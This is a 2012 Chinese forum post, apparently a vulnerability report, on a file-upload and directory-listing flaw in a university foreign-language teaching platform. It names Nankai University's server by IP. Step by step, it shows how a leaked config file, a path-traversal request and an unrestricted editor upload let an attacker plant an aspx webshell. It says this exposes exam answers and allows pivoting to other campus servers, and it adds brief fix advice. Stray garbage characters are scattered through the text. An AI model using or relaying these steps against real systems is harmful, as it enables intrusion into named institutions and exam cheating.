中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

---

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

/ q! B  w# m0 R详细说明：

以南开大学的为例:
) Q8 v- Q0 P8 m+ _# Q7 Hhttp://222.30.60.3/NPELS
9 F! h# T4 b5 uNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
! _* G) u9 R% q$ w<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
  e  s; H4 T, v" n" `6 C: r</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
( a) U. I+ ?& P* r直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
! N1 H/ _* F( O& m. ]; Chttp://222.30.60.3/NPELS/CommonS ... List?version=../../
6 V+ R5 L  \+ `+ Z  A4 T
发现
- v6 E4 Q+ _# {- C1 Z3 \# s) ihttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
; R3 J( [0 [; p3 ^9 G& {! {上传后继续列目录找到木马地址直接访问即可

1 ^2 {0 c6 @" }. g1 t6 j0 u) C4 OOOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
0 j: c1 n( c) M( u0 k- |! c漏洞证明：

4 @* ]; y5 v6 l; Y; ?6 h. T列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
% M8 a) n/ i4 M" k& m; b1 t$ [文件上传：
% \! H4 B8 G7 {http://222.30.60.3/npelsv/editor/editor.htm
' n8 L  ^7 k; J- v1 Q' e5 l; m  G
上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
& S6 j1 n: Z8 B( f
修复方案：
好像考试系统必须使用 CommonService.asmx
' E# s7 T1 B. x& G* d最好配置文件加密或者用别的方式不让它泄露出来
6 I- Y9 E/ j, M, C并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
* T0 m  L: @& z$ e

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2